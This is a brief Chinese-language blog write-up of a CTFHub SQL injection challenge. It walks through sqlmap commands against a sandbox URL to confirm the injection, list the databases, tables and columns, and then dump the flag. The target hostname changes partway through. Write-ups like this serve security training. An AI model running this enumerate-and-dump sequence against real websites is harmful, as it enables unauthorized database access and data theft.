1.题目
2.使用的环境及工具
环境:kail linux
工具:sqlmap
3.操作步骤
本题是基于sql的注入,首先考虑sqlmap,先查看这个sql是否存在注入
~~~sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1
检查一下全部数据库内容
sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1 --dbs
返回值有四个,但是除了sqli,其他都是配置,所以重点在sqli上
sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables
发现表了之后访问sqli的所有列
sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
最后读取flag的值
sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
标签:sqlmap,WEB,http,CTFHUB,challenge,sqli,10800,id,注入 From: https://www.cnblogs.com/manmanwei/p/16815704.html